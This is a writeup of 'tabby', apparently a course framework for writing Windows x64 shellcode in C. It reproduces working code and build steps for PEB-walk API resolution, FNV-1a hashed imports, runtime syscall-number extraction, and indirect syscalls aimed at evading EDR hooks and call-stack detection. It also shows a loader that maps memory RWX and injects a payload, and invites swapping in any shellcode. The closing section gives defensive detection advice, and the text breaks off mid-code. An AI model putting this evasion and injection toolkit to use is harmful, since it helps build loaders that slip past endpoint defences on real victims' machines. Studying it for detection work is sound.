img/ folder; technical code snippets and the project-rationale table are reproduced verbatim with attribution. Prose summary is original.

Executive Summary
tabby is cocomelonc’s minimal teaching framework for building position-independent Windows x64 shellcode in C, designed for the upcoming Malware Development for Ethical Hackers (2026) course. The pitch: write your payload as a normal sc_main(PVOID base) function in C, let a small entry stub, a PEB walker, an FNV-1a hash table and a stack-string macro handle PIC, base-address recovery, API resolution and shellcode-safe strings — and let an indirect NT syscall dispatcher hide the syscall behind ntdll’s own syscall; ret gadget. The output is a flat shellcode.bin with no PE header, no IAT, no CRT — ready to inject into any Windows x64 process. The whole project is small enough to read end-to-end in one sitting: roughly 500 lines of C plus 80 lines of NASM.
What makes tabby interesting compared to the existing landscape isn’t novelty — every individual technique it uses (RDIP base recovery, PEB+EAT walking, FNV-1a hashed exports, indirect syscalls past EDR hooks) is in the public literature. The interesting part is that everything is laid bare in a small, readable codebase, and the entire build pipeline runs on Linux: mingw-w64 + nasm + a custom linker script + objcopy. No MSVC, no Windows SDK, no Wine. That makes it usable as a study object — you can read the entry stub, the PEB walker, the stack-string macro and the syscall stubs side by side and understand exactly which detection problem each piece solves.
The Four Ideas Holding It Together
cocomelonc structures the README around four concepts that map one-to-one to the framework’s files:
- Write shellcode in C, not assembly. The framework handles PIC, base-address recovery, API resolution, and syscall dispatch. The hand-written assembly is confined to a ~20-line entry stub and 3-instruction syscall stubs generated by a macro.
- No PE header, no IAT, no CRT. The output is a flat .bin starting at byte 0 with _start at offset 0. There are no imports: every Windows API is resolved at runtime by FNV-1a hash via a PEB walk + EAT walk. There is no libc; the STACKSTR macro builds strings on the stack so they never appear in .rdata.
- Indirect syscalls that look clean on the call stack. Instead of executing syscall ourselves (which leaves the shellcode as the return address, flagged by call-stack-aware EDRs), each stub jumps to the syscall; ret bytes already living inside ntdll’s own stub, past any EDR inline hook. The kernel sees a return address inside ntdll.
- Linux-only toolchain. mingw-w64 + nasm + a custom linker script + objcopy. Zero Windows dependency to build.
Each component answers a specific detection problem:
- entry.asm: how does shellcode find its own base address? (RDIP)
- resolve.c: how do we call Windows APIs with no IAT? (PEB + EAT walk)
- pic.h: how do we avoid string IOCs? (FNV-1a hashes + STACKSTR)
- stubs.asm: how do we bypass EDR hooks on ntdll? (indirect syscalls)
- syscall.c: how do we get SSNs without hardcoding them? (runtime extraction)
- flat.ld: how do we produce raw bytes from a normal toolchain? (linker script + objcopy)
cocomelonc positions the project explicitly against the alternatives: code generators like SysWhispers hide these mechanics behind generation steps, and full C2 frameworks like Cobalt Strike are too big to study end-to-end. tabby is described as the minimum viable framework that makes each technique inspectable.
What It Is Not
Three sharp negatives from the README that are worth restating before anyone misreads the project:
- Not a C2 or post-exploitation framework.
- Not a packer or crypter for existing PE files.
- Not a polished offensive tool. It is a teaching framework for the Malware Development for Ethical Hackers trainings. The README is structured around why each design decision was made — the project-structure rationale table is the spine of the documentation.
Core Concept 1 — Position-Independent Code
A normal Windows EXE is built around a preferred load address. The linker bakes absolute addresses for function pointers, global variables and string literals into the binary, and the PE loader patches them through base relocations if the image lands elsewhere. Shellcode has no loader to do that patching: move the code and those absolute addresses become garbage, and the process crashes on the first dereference. Shellcode, by definition, must run no matter where it lands.
On x86-64 the basics are easier than on 32-bit because CALL rel32 and LEA reg, [rip+N] are already RIP-relative by design. The remaining problems are specific:
- Strings and constants. The compiler normally places them in .rdata at a fixed address. tabby merges .rdata into .text via the linker script and uses STACKSTR to materialise strings on the stack at runtime.
- Global variables. The SSN slots and the gadget pointer must live somewhere the stubs can find them via [rel label]. They live in .text too; the linker script discards .data and .bss.
- _start at byte 0. The entry object is pinned first in the linker script so jumping to the first byte of shellcode.bin always lands in _start.
The entry stub (asm/entry.asm) uses the classic RDIP trick to recover its own load address:
call .here
.here:
pop rcx ; rcx = runtime address of .here
sub rcx, (.here - _start) ; rcx = base of shellcode
This gives sc_main() a pointer to the shellcode’s own base, which is useful when you embed a secondary payload or config block after the code (the demo example/alloc_exec.c does exactly this).
Core Concept 2 — API Resolution Without Imports
A normal program calls Windows APIs through the Import Address Table. At load time the PE loader fills the IAT for you, doing the equivalent of LoadLibrary and GetProcAddress for every import. A flat shellcode blob has no IAT, so you have to find APIs yourself.
The canonical mechanism is a walk of the Process Environment Block (PEB):
gs:[0x60] -> PEB
└─ Ldr -> PEB_LDR_DATA
└─ InLoadOrderModuleList (doubly-linked)
├─ ntdll.dll
├─ kernel32.dll
└─ ...
Every loaded DLL is in this list along with its base address and name. Once you have a module base, you walk its Export Address Table (EAT) — three parallel arrays of names, ordinals and function RVAs — to find a specific export.
Doing this by string comparison is noisy and leaves IOCs. tabby hashes the export names instead and compares those. The hash function is FNV-1a 32-bit — fast, well-distributed, trivial to implement without a CRT:
DWORD fnv1a(const char *s) {
DWORD h = 0x811c9dc5;
while (*s) { h ^= (BYTE)*s++; h *= 0x01000193; }
return h;
}
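For checking hash constants on the build host, the same function can be written against <stdint.h> instead of tabby’s own types.h. The sketch below is an illustration, not repository code. fnv1a_lower_w is a hypothetical helper showing one way to get the case-insensitive DLL-name behaviour noted in this section (fold ASCII to lowercase, hash the low byte of each UTF-16 code unit); tabby’s resolve.c may fold case differently. The self-test uses the published FNV-1a 32-bit vectors for "" and "a".

```c
#include <assert.h>
#include <stdint.h>

/* 32-bit FNV-1a: offset basis 0x811c9dc5, prime 0x01000193. */
static uint32_t fnv1a(const char *s) {
    uint32_t h = 0x811c9dc5u;
    while (*s) {
        h ^= (uint8_t)*s++;  /* XOR the next byte in first...              */
        h *= 0x01000193u;    /* ...then multiply (plain FNV-1 is reversed) */
    }
    return h;
}

/* Hypothetical helper (not from tabby): hash a NUL-terminated UTF-16 module
   name with ASCII A-Z folded to lowercase, feeding only the low byte of each
   code unit, so "KERNEL32.DLL" and "kernel32.dll" produce the same value. */
static uint32_t fnv1a_lower_w(const uint16_t *w) {
    uint32_t h = 0x811c9dc5u;
    while (*w) {
        uint16_t c = *w++;
        if (c >= 'A' && c <= 'Z')
            c = (uint16_t)(c + ('a' - 'A'));
        h ^= (uint8_t)c;
        h *= 0x01000193u;
    }
    return h;
}

/* Published FNV-1a 32-bit test vectors. */
static void fnv1a_self_test(void) {
    assert(fnv1a("") == 0x811c9dc5u);
    assert(fnv1a("a") == 0xe40c292cu);
}
```

Because the hash is computed over bytes, a constant produced this way on Linux matches the one computed at runtime on Windows, which is what lets tools/hash.py pre-compute the values in ntapi.h.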
Pre-computed hash constants live in include/ntapi.h. The tools/hash.py helper generates or verifies them:
$ python3 tools/hash.py NtAllocateVirtualMemory ntdll.dll
NtAllocateVirtualMemory -> 0xca67b978u
ntdll.dll -> 0xa62a3b3bu

Figure: tools/hash.py. Source: original repository.
The DLL-name comparison is case-insensitive (the names are lowercased during the LDR walk). Export names are compared case-sensitively because the EAT preserves the original casing of each export.
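The name → ordinal → RVA indirection inside the EAT is easy to get wrong, so a toy model helps. This is a simplified sketch under stated assumptions: toy_exports and toy_resolve are hypothetical names, the arrays are plain C arrays rather than RVAs inside a mapped image, and nothing here touches the PEB or a real module. It mirrors the PE rule that AddressOfNameOrdinals holds an index into AddressOfFunctions (not biased by the export Base) and, like the export lookup described above, it matches case-sensitively.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

static uint32_t fnv1a(const char *s) {
    uint32_t h = 0x811c9dc5u;
    while (*s) { h ^= (uint8_t)*s++; h *= 0x01000193u; }
    return h;
}

/* Toy stand-in for IMAGE_EXPORT_DIRECTORY. In a real PE the three arrays are
   RVAs relative to the module base; here they are ordinary C arrays. */
typedef struct {
    uint32_t           num_names;  /* NumberOfNames                              */
    uint32_t           num_funcs;  /* NumberOfFunctions                          */
    const char *const *names;      /* AddressOfNames[i]        -> name string    */
    const uint16_t    *name_ords;  /* AddressOfNameOrdinals[i] -> index in funcs */
    const uint32_t    *funcs;      /* AddressOfFunctions[idx]  -> function RVA   */
} toy_exports;

/* Return the RVA of the export whose name hashes to `want`, or 0 if none does.
   Hashing the exact bytes of each name makes the match case-sensitive. */
static uint32_t toy_resolve(const toy_exports *e, uint32_t want) {
    assert(e != NULL);
    for (uint32_t i = 0; i < e->num_names; i++) {
        if (fnv1a(e->names[i]) != want)
            continue;
        uint16_t idx = e->name_ords[i];  /* index, not biased by the ordinal Base */
        return idx < e->num_funcs ? e->funcs[idx] : 0;
    }
    return 0;
}
```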
Core Concept 3 — Indirect Syscalls
Calling something like NtAllocateVirtualMemory from shellcode through the normal ntdll export runs straight into EDR instrumentation. The EDR installs an inline hook: it overwrites the first bytes of the ntdll stub with a JMP into its own code, inspects the call, and then either lets it proceed or blocks it.
Direct syscalls bypass the hook by setting up the system-call number (SSN) in EAX and executing syscall ourselves:
mov eax, 0x18 ; SSN for NtAllocateVirtualMemory
mov r10, rcx ; NT ABI: r10 must mirror rcx
syscall
This dodges the inline hook, but it creates a new problem: the syscall now returns to our_shellcode+N, so the user-mode return address the kernel records points into unbacked shellcode memory instead of ntdll. Call-stack-aware EDRs flag any syscall whose return address isn’t inside ntdll.
Indirect syscalls fix this. Instead of executing syscall ourselves, we jump to the syscall; ret instruction pair that already exists inside ntdll’s own stub — past the EDR hook. Looking at ntdll!NtAllocateVirtualMemory:
ntdll!NtAllocateVirtualMemory:
4C 8B D1 mov r10, rcx <- hook overwrites here
B8 18 00 00 00 mov eax, 0x18
0F 05 syscall <- we jump to here
C3 ret
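Now the instruction the syscall returns to (the ret) is inside ntdll, so the return address the kernel records points into ntdll rather than into the shellcode. The top of the call stack looks clean.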
The SSN itself is extracted at runtime by scanning the ntdll stub for the mov eax, imm32 byte pattern (0xB8). This works even on hooked stubs because hooks typically clobber only the first bytes (the mov r10, rcx prologue) and leave the mov eax sequence intact further down:
static DWORD extract_ssn(PBYTE stub) {
for (int i = 0; i < 32; i++) {
if (stub[i] == 0xB8) {
DWORD ssn = *(DWORD *)(stub + i + 1);
if (ssn < 0x600) return ssn; // sanity: no NT SSN is >= 0x600
}
}
return (DWORD)-1;
}
Core Concept 4 — The Linux-Only Toolchain
A Windows PE targets Windows, but building one is just C and assembly source going through a normal toolchain. mingw-w64 is a complete Win64 cross-compiler that runs on Linux and produces native Windows COFF objects and PE executables. The flat-binary extraction step uses objcopy to peel the .text section out of the PE wrapper. The pipeline as cocomelonc lays it out:
C source -> x86_64-w64-mingw32-gcc -> Win64 COFF .o
ASM -> nasm -f win64 -> Win64 COFF .o
COFF .o -> x86_64-w64-mingw32-ld -> PE .elf (single .text section)
PE .elf -> x86_64-w64-mingw32-objcopy -> shellcode.bin (raw bytes)
Nothing in this pipeline touches Windows. The output runs on Windows because the machine code itself is Win64-ABI compliant.
Repository Layout
tabby/
├── include/
│ ├── types.h windows types from scratch - no SDK, no CRT headers
│ ├── pic.h FNV-1a hash, STACKSTR macro, GETAPI helper, module hashes
│ └── ntapi.h NT function pointer types, sc_* declarations, hash constants
├── src/
│ ├── crt.c sc_memcpy / sc_memset / sc_memcmp / sc_strlen
│ ├── resolve.c find_module (PEB walk) + resolve_export (EAT walk) + find_syscall_gadget
│ └── syscall.c SSN extraction + syscall_init()
├── asm/
│ ├── entry.asm _start at byte 0: RDIP -> sc_main(base)
│ └── stubs.asm SSN slots + g_syscall_gadget + indirect syscall stubs (8 NT functions)
├── ld/
│ └── flat.ld linker script: flatten .text and .rdata$* into single .text at offset 0
├── example/
│ ├── exec.c minimal demo: PEB walk -> kernel32 -> WinExec("calc.exe")
│ └── alloc_exec.c full demo: syscall init -> NtAlloc -> NtWrite -> NtProtect RWX -> NtCreateThreadEx
└── tools/
├── hash.py FNV-1a pre-computation for ntapi.h constants
└── loader.c minimal Win64 test loader: maps shellcode.bin and executes it
Building It
Install on Ubuntu / Debian:
sudo apt install mingw-w64 nasm binutils-mingw-w64-x86-64

Clone and build:
git clone https://github.com/cocomelonc/tabby
cd tabby
make
Expected output:
nasm -f win64 -I include/ asm/entry.asm -o obj/entry.o
nasm -f win64 -I include/ asm/stubs.asm -o obj/stubs.o
x86_64-w64-mingw32-gcc ... -c src/crt.c -o obj/crt.o
x86_64-w64-mingw32-gcc ... -c src/resolve.c -o obj/resolve.o
x86_64-w64-mingw32-gcc ... -c src/syscall.c -o obj/syscall.o
x86_64-w64-mingw32-gcc ... -c example/alloc_exec.c -o obj/alloc_exec.o
x86_64-w64-mingw32-ld -T ld/flat.ld --gc-sections -o bin/shellcode.elf ...
x86_64-w64-mingw32-objcopy --only-section=.text -O binary ...
[=^..^=] shellcode.bin 1760 bytes

Figure: shellcode.bin at 1760 bytes, including the indirect-NT-syscall machinery. Source: original repository.
The single linker warning (section below image base) is expected: the linker script intentionally places .text at virtual address 0 so the flat binary starts at byte 0.
A smaller standalone test shellcode (PEB walk + WinExec only, no indirect NT syscalls) is also available:
make exec # produces bin/exec.bin (~416 bytes)

Figure: WinExec, ~416 bytes. Source: original repository.
Verifying the Output Bytes
Disassemble the first bytes on Linux to confirm _start is at offset 0:
ndisasm -b 64 bin/shellcode.bin | head -20
Expected:
00000000 53 push rbx
00000001 57 push rdi
00000002 56 push rsi
00000003 4883EC20 sub rsp,byte +0x20 ; shadow space, preserves 16-byte alignment
00000007 E800000000 call 0xc
0000000C 59 pop rcx ; <- RDIP trick
0000000D 4883E90C sub rcx,byte +0xc ; rcx = base of shellcode
00000011 E8XXXXXXXX call sc_main
...
0000001E 6690 xchg ax,ax ; padding to 0x20
00000020 0000 ssn_NtAllocateVirtualMemory (dd 0, populated at runtime)
00000024 0000 ssn_NtWriteVirtualMemory
...
00000040 0000 g_syscall_gadget (dq 0)
00000048 8B05D2FFFFFF mov eax,[rel ssn_NtAllocateVirtualMemory] ; <- first syscall stub (disp32 = 0x20 - 0x4E)

Figure: ndisasm output: _start at offset 0, RDIP sequence at 0x07–0x0D, SSN slots in .text from 0x20, first syscall stub at 0x48. Source: original repository.
The RDIP sequence at 0x07–0x0D is the canonical PIC base-address recovery. The SSN slots and the gadget pointer live in .text at offsets 0x20–0x47 so they survive the objcopy --only-section=.text extraction and remain reachable via RIP-relative addressing at any load address. The first syscall stub starts at 0x48.
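Both numeric claims behind this listing can be replayed as plain arithmetic. A minimal sketch, assuming the offsets shown above (call at 0x07, so .here is at 0x0C) and that _start is entered the way a Win64 thread start routine is, with RSP equal to 8 mod 16; rdip_base and sc_main_rsp_mod16 are hypothetical names, and nothing here executes the real stub. Swapping sub rsp, 0x20 for 0x28 shows why the entry stub uses 0x20.

```c
#include <assert.h>
#include <stdint.h>

/* RDIP: `call .here` pushes the runtime address of .here and `pop rcx` takes it;
   subtracting .here's offset from _start (0x0C in the listing) gives the base. */
static uint64_t rdip_base(uint64_t popped_rcx, uint64_t here_offset) {
    return popped_rcx - here_offset;
}

/* RSP mod 16 on entry to sc_main, replaying the prologue one step at a time. */
static unsigned sc_main_rsp_mod16(uint64_t rsp_at_start, unsigned pushes,
                                  uint64_t sub_rsp) {
    uint64_t rsp = rsp_at_start;
    rsp -= 8u * pushes;  /* push rbx / push rdi / push rsi         */
    rsp -= sub_rsp;      /* sub rsp, N                             */
    rsp -= 8u;           /* call sc_main pushes its return address */
    return (unsigned)(rsp % 16u);
}

static void entry_stub_self_test(void) {
    const uint64_t base = 0x000001A2B3C40000ull;    /* any load address works  */
    assert(rdip_base(base + 0x0C, 0x0C) == base);

    const uint64_t rsp0 = 0x14FF28;                 /* 8 mod 16, as after a call */
    assert(sc_main_rsp_mod16(rsp0, 3, 0x20) == 8);  /* Win64-correct for a callee */
    assert(sc_main_rsp_mod16(rsp0, 3, 0x28) == 0);  /* misaligned by 8 bytes      */
}
```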
Running It on Windows
bin/shellcode.bin is a raw byte blob — not an executable. To run it on Windows you need a loader: a normal Win32 program that maps the blob into memory and jumps into it.
Build the loader
On Linux, cross-compile tools/loader.c with:
make loader
This produces bin/loader.exe via mingw-w64 — still no Windows required.

Figure: loader.exe on Linux with x86_64-w64-mingw32-gcc. Source: original repository.
Deploy and run
Copy both files to the Windows machine and run:
.\loader.exe shellcode.bin

Figure: shellcode.bin running on Windows; the full indirect-NT-syscall pipeline pops calc.exe. Source: original repository.
Or, to test the smaller standalone shellcode first:
.\loader.exe exec.bin

Figure: exec.bin, the PEB-walk-only variant, calling WinExec("calc.exe") directly. Source: original repository.
Both pop calc.exe. The difference: exec.bin calls WinExec directly (PEB walk + EAT walk only) while shellcode.bin does the full indirect-NT-syscall injection pipeline (NtAllocateVirtualMemory → NtWriteVirtualMemory → NtProtectVirtualMemory → NtCreateThreadEx) using exec.bin’s bytes as the embedded payload. If exec.bin pops calc but shellcode.bin doesn’t, the bug is somewhere in the indirect-syscall path (SSN extraction, gadget address, stub calling convention, or NtCreateThreadEx arguments), not in the framework basics.
What the loader does
fopen("shellcode.bin", "rb") // reads the raw bytes
VirtualAlloc(NULL, sz, RW) // allocates a private RW region
fread -> buf // copies shellcode in
VirtualProtect(buf, sz, RWX) // flips the region to execute-read-write
CreateThread(buf) // spawns a thread at byte 0
WaitForSingleObject(thread, INFINITE) // waits for shellcode to return
VirtualFree + CloseHandle // cleans up
The region is mapped RWX (not RX) because syscall_init() writes the extracted SSN values into the shellcode’s own .text section at runtime. Without write access the first store would #AV and the thread would die silently.
The loader prints the load address before jumping so you can attach a debugger at the right offset:
[=^..^=] loaded 1760 bytes from shellcode.bin
[=^..^=] executing at 0x000001A2B3C40000
The bundled example payload (example/alloc_exec.c) spawns calc.exe via the following sequence:
- Allocate a fresh RW region via NtAllocateVirtualMemory (indirect syscall).
- Write an embedded mini-shellcode (PAYLOAD[] = example/exec.c compiled: PEB walk → WinExec("calc.exe")).
- Flip the region to RWX via NtProtectVirtualMemory.
- Spawn a thread on it via NtCreateThreadEx.
- Wait for the thread, close the handle, free the region.
Swap PAYLOAD[] with any position-independent x64 shellcode and rebuild with make.
Writing Your Own Shellcode
- Copy example/alloc_exec.c or example/exec.c as a starting template, or create a new file in example/.
- Write a sc_main(PVOID base) function. If you call any sc_Nt* stub, call syscall_init(ntdll) first. base is the runtime address of byte 0 of your shellcode, useful if you embed config or a secondary payload after the code.
- Add a build rule for your .c file in Makefile and list its .o in C_OBJS (or replace alloc_exec.o).
- Run make (or make exec for a variant that excludes the syscall stubs entirely).
Using the PEB resolver
PVOID ntdll = find_module(H_NTDLL);
PVOID kernel32 = find_module(H_KERNEL32);
To resolve any export by name:
typedef HANDLE (*GetStdHandle_t)(DWORD);
GetStdHandle_t pGetStdHandle = (GetStdHandle_t) resolve_export(kernel32, H_GetStdHandle);
Or with the GETAPI macro:
HANDLE h = GETAPI(H_KERNEL32, H_GetStdHandle, GetStdHandle_t)(STD_OUTPUT_HANDLE);
Using the indirect syscalls
After syscall_init(ntdll), call the sc_Nt* functions exactly like the real NT API:
PVOID region = NULL;
SIZE_T size = 4096;
NTSTATUS st = sc_NtAllocateVirtualMemory(
(HANDLE)-1, // current process
&region,
0,
&size,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
if (!NT_SUCCESS(st)) { /* handle error */ }
The set of pre-defined stubs:
| function | args | notes |
|---|---|---|
| sc_NtAllocateVirtualMemory | 6 | allocate memory in a process |
| sc_NtWriteVirtualMemory | 5 | write across process boundary |
| sc_NtProtectVirtualMemory | 5 | change page protection |
| sc_NtFreeVirtualMemory | 4 | release allocation |
| sc_NtCreateThreadEx | 11 | spawn thread in local or remote process |
| sc_NtWaitForSingleObject | 3 | wait on a handle |
| sc_NtClose | 1 | close a handle |
| sc_NtTerminateProcess | 2 | terminate a process |

Table source: original repository.
Strings: never in .rdata
Don’t write:
const char *msg = "hello"; // ends up in .rdata -> fixed address -> crash
Use STACKSTR instead:
STACKSTR(msg, "hello"); // pushed onto the stack character by character
Adding a new NT syscall stub
Step 1. Add the SSN slot and stub to asm/stubs.asm (slot lives in .text, not .bss, so it survives flat-binary extraction):
global ssn_NtOpenProcess
ssn_NtOpenProcess: dd 0
STUB NtOpenProcess, ssn_NtOpenProcess
The STUB macro emits a single, ABI-clean stub — no argument shifting needed for any number of arguments because the Win64 calling convention already places args 5+ at [rsp+28h], exactly where the kernel reads them.
Step 2. Declare the SSN extern and add the LOAD_SSN call inside src/syscall.c:
extern DWORD ssn_NtOpenProcess;
...
LOAD_SSN(ssn_NtOpenProcess, H_NtOpenProcess);
Step 3. Add the hash constant to include/ntapi.h:
#define H_NtOpenProcess 0xXXXXXXXXu
Compute it:
python3 tools/hash.py NtOpenProcess

Step 4. Declare the prototype in include/ntapi.h:
NTSTATUS sc_NtOpenProcess(HANDLE *, DWORD, OBJECT_ATTRIBUTES *, CLIENT_ID *);
How Indirect Syscall Dispatch Works, Step by Step
Take sc_NtAllocateVirtualMemory as the example. The C caller looks like:
sc_NtAllocateVirtualMemory((HANDLE)-1, &region, 0, &size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
The Win64 calling convention maps this to:
RCX = (HANDLE)-1
RDX = &region
R8 = 0
R9 = &size
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE <- 5th arg on stack
[RSP+0x30] = PAGE_READWRITE <- 6th arg on stack
The stub itself is three instructions:
sc_NtAllocateVirtualMemory:
mov eax, dword [rel ssn_NtAllocateVirtualMemory] ; EAX <- SSN
mov r10, rcx ; R10 <- RCX (NT ABI)
jmp qword [rel g_syscall_gadget]
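The stub doesn’t touch the stack, doesn’t shift arguments and doesn’t modify RSP. The Win64 calling convention already places args 5+ at [rsp+28h], [rsp+30h] and so on, and the kernel reads them from those offsets after syscall. The one register move exists because the syscall instruction overwrites RCX with the return RIP (and R11 with RFLAGS), so the kernel takes arg 1 from R10 instead. At the point of JMP, the register/stack state is: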
EAX = SSN
R10 = (HANDLE)-1 <- arg 1 (kernel reads R10, not RCX, after syscall)
RDX = &region <- arg 2
R8 = 0 <- arg 3
R9 = &size <- arg 4
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE <- arg 5
[RSP+0x30] = PAGE_READWRITE <- arg 6
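The JMP lands on the syscall; ret bytes inside ntdll’s own NtAllocateVirtualMemory stub, past any EDR hook. The kernel services the call and resumes at the ret inside ntdll, which pops the return address pushed by the C caller’s call and lands back in the shellcode. The user-mode RIP the kernel records at syscall time, and therefore the innermost frame any call-stack scanner sees, is inside ntdll rather than inside our shellcode; the frame below it still points into the shellcode.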
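Why one three-instruction stub serves 1-argument NtClose and 11-argument NtCreateThreadEx alike comes down to fixed Win64 stack offsets. A small sketch; win64_stack_arg_offset is a hypothetical helper, not part of tabby. It reproduces the 0x28 and 0x30 offsets in the listing above and puts the 11th argument of NtCreateThreadEx at 0x58.

```c
#include <assert.h>
#include <stddef.h>

/* Offset from RSP of 1-based argument n (n >= 5) at the callee's first
   instruction. The stub never moves RSP, so the same offsets hold at its jmp
   and at ntdll's syscall. Layout: [rsp+0x00] return address,
   [rsp+0x08..0x27] 32-byte shadow space for args 1-4, then args 5, 6, ... */
static size_t win64_stack_arg_offset(unsigned n) {
    assert(n >= 5);  /* args 1-4 travel in RCX, RDX, R8, R9 */
    return 0x28u + 8u * (size_t)(n - 5u);
}
```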
Replacing the Payload
The example/alloc_exec.c demo ships with the compiled bytes of example/exec.c as PAYLOAD[]. To use your own:
static const BYTE PAYLOAD[] = {
// paste your x64 shellcode bytes here
0x48, 0x31, 0xc0, ...
};
Regenerate the bytes from a fresh make exec build:
make exec
python3 -c "
data = open('bin/exec.bin','rb').read()
for i in range(0, len(data), 12):
    print('    ' + ', '.join(f'0x{b:02x}' for b in data[i:i+12]) + ',')
"
Or generate shellcode with any external framework (msfvenom, donut, your own) and paste the byte array. The framework handles allocation, write, protection flip and thread creation — you only need to provide the bytes.
The Project-Structure Rationale Table
This is the table at the heart of the README. It is a list of every compiler flag, linker option and design decision in tabby, each with the precise reason it’s there. It is reproduced verbatim because the reasoning is the entire point of the project as a teaching artifact.
| decision | reason |
|---|---|
| -nostdlib -nostdinc -ffreestanding | zero CRT dependency; everything in the binary came from our own source |
| -fno-builtin | prevents GCC emitting implicit memcpy/memset calls to CRT |
| -mno-red-zone | Win64 does not honour the System V red zone; without this, signal delivery or asynchronous callbacks can corrupt our stack frame |
| -mcmodel=small | critical: forces direct IMAGE_REL_AMD64_REL32 relocations for global symbol access. without it, mingw64 emits .refptr.<sym> indirection through .rdata that holds the absolute link-time VMA. for our flat binary with . = 0 that VMA is meaningless at runtime; every SSN store would crash with #AV |
| -fno-asynchronous-unwind-tables | suppresses .eh_frame generation; we discard it anyway but this avoids linker noise |
| -ffunction-sections -fdata-sections + ld --gc-sections | dead-code elimination: drops unused symbols (e.g. sc_memcpy if no STACKSTR is large enough to need it) so the binary contains only what’s actually called |
| -Os | size optimisation keeps shellcode small; also discourages the compiler from emitting CRT helper calls |
| nasm -f win64 | produces Win64 COFF objects compatible with mingw-w64-ld; full access to NASM macros for clean stub generation |
| SSN slots in .text (via NASM dd 0) | mingw64 places C globals in .bss, which our linker script discards. defining the slots in NASM’s .text section guarantees they survive objcopy --only-section=.text and the stubs’ [rel ssn_*] displacements resolve correctly |
| linker script at . = 0 + .rdata$* .text$* merged into .text | lets objcopy --only-section=.text produce a flat binary starting at offset 0 with no PE overhead; the $* wildcards catch COFF section groups emitted by -ffunction-sections/-fdata-sections |
| entry stub sub rsp, 0x20 (not 0x28) | after push rbx/rdi/rsi the stack is already 16-aligned. sub rsp, 0x20 (32, a multiple of 16) preserves alignment so sc_main receives the Win64-ABI-correct RSP mod 16 = 8. otherwise MOVAPS inside any Windows DLL (e.g. CreateProcess inside WinExec) raises #AC and the thread dies silently |
| FNV-1a over CRC32 | equally fast, no special instructions required, fits in 6 lines of C |
| per-function SSN slots | avoids a generic do_syscall(ssn, ...) wrapper that would need to shift a variable number of stack arguments; each stub has the exact Win64 signature the kernel expects |

Table source: original repository README.
Key Takeaways
- Every technique tabby uses has been seen before. The contribution is the small, readable surface area: ~500 lines of C plus ~80 lines of NASM, with a one-paragraph rationale for every non-obvious choice. It’s built explicitly as a teaching artifact for the Malware Development for Ethical Hackers course.
- Linux-only toolchain matters more than it sounds. mingw-w64 + nasm + a custom linker script + objcopy means no Windows / MSVC / Wine in the build pipeline; it also means CI for malware-research courses can run on stock Linux runners without complex VM orchestration.
- Indirect syscalls are the headline EDR-evasion technique on display. Jumping to ntdll’s own syscall; ret defeats both inline-hook detection and call-stack-aware detectors that flag syscalls returning into non-ntdll memory.
- SSNs are extracted at runtime, not hard-coded. Scanning the ntdll stub for the 0xB8 (mov eax, imm32) byte pattern means the same shellcode works across Windows builds even as Microsoft reshuffles syscall numbers.
- FNV-1a + STACKSTR eliminate plaintext IOCs. No DLL or function names in .rdata, no plaintext payload strings: everything is either hashed at compile time or pushed onto the stack at runtime.
- The flat-binary trick is mostly the linker script. The . = 0 placement, the .rdata$* .text$* wildcard merge into a single .text, and the explicit discard of .data/.bss together let objcopy --only-section=.text produce a byte-zero-aligned blob with no PE overhead.
- The -mcmodel=small flag is load-bearing. The README explicitly calls this out: without it, mingw-w64 introduces .refptr.<sym> indirection that breaks at VMA = 0. Anyone reproducing this trick on their own toolchain must keep this flag.
Defensive Recommendations
- Don’t rely on inline-hook detection alone. Indirect-syscall frameworks like tabby render ntdll inline hooks useless: the hooked bytes are stepped over because the shellcode jumps directly to the post-hook syscall; ret. Pair user-mode hooks with kernel-level telemetry (PsSetCreateThreadNotifyRoutineEx, ETW Threat Intelligence, syscall provenance) to catch the actual syscall regardless of how the call site reached it.
- Hunt for call-stack provenance, not just call-stack-inside-ntdll. Indirect syscalls leave the kernel-visible return address inside ntdll, but the stack frame below that is still attacker-controlled memory. Detection rules that walk the call stack and check whether the parent frame is mapped to a backed PE file (rather than an RX/RWX private allocation) will surface tabby-style payloads. Pavel Yosifovich’s and ETW Threat Intelligence based detectors do this; build it into your EDR if it isn’t there.
- RWX private allocations from non-PE code are still the high-signal IOC. The bundled loader maps the shellcode RWX because syscall_init() writes the extracted SSNs into the shellcode’s own .text at runtime. Any modern EDR should treat the creation of an RWX private allocation that subsequently hosts an executing thread (via CreateThread or NtCreateThreadEx on the allocation base) as a near-certain malicious pattern outside of very narrow benign exceptions (JIT compilers in known processes).
- Audit ETW Threat Intelligence event volume. EDRs that consume ETW-TI get a syscall-level view that bypasses user-mode hooks entirely. If your stack disables ETW-TI (some performance-tuned deployments do) you are blind to exactly this class of attack.
- Block VirtualProtect/NtProtectVirtualMemory transitions from RW to RX/RWX on private allocations from low-trust contexts. EDR rules can enforce this directly, and Arbitrary Code Guard does so for processes that never need dynamic code; WDAC/AppLocker policies help upstream by restricting which loaders may run at all. The loader’s explicit RW → RWX flip is one of the single highest-signal events you can hook.
- Treat unique FNV-1a / DJB2 / similar hash constants as YARA signal. 0xca67b978 (the FNV-1a hash of NtAllocateVirtualMemory) is a fingerprint of this exact tooling pattern. Build YARA rules that flag several FNV-1a constants appearing together (export-name hashes alongside the 0x811c9dc5 offset basis and the 0x01000193 prime) in non-trivial binaries.
- Process memory scanning that walks executable allocations and looks for missing PE headers at the start of the allocation is a high-confidence detector for flat-shellcode loaders. tabby’s shellcode.bin is byte-for-byte recognizable as not a PE because it begins with the entry stub at offset 0.
- Educational frameworks like this are a defender’s gift. Read tabby end-to-end as a study of where modern offensive tooling actually puts its evasion. The same mechanics are present in commercial C2 frameworks at far greater scale; reading the minimal version helps your detection engineers reason about the full implementation.
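The FNV-1a-constant and missing-PE-header ideas above can be combined into a cheap first-pass triage check over a dumped executable region. A minimal sketch, not a production detector: triage_result, contains_le32 and triage are hypothetical names, and the check only looks for the FNV-1a offset basis and prime as little-endian 32-bit immediates. A compiler is free to encode them differently (for instance by replacing the multiply with shifts and adds), and plenty of benign code uses FNV-1a, so a hit is a signal to correlate with allocation type and thread start address, not a verdict.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct {
    int has_mz;         /* region starts with a PE "MZ" header      */
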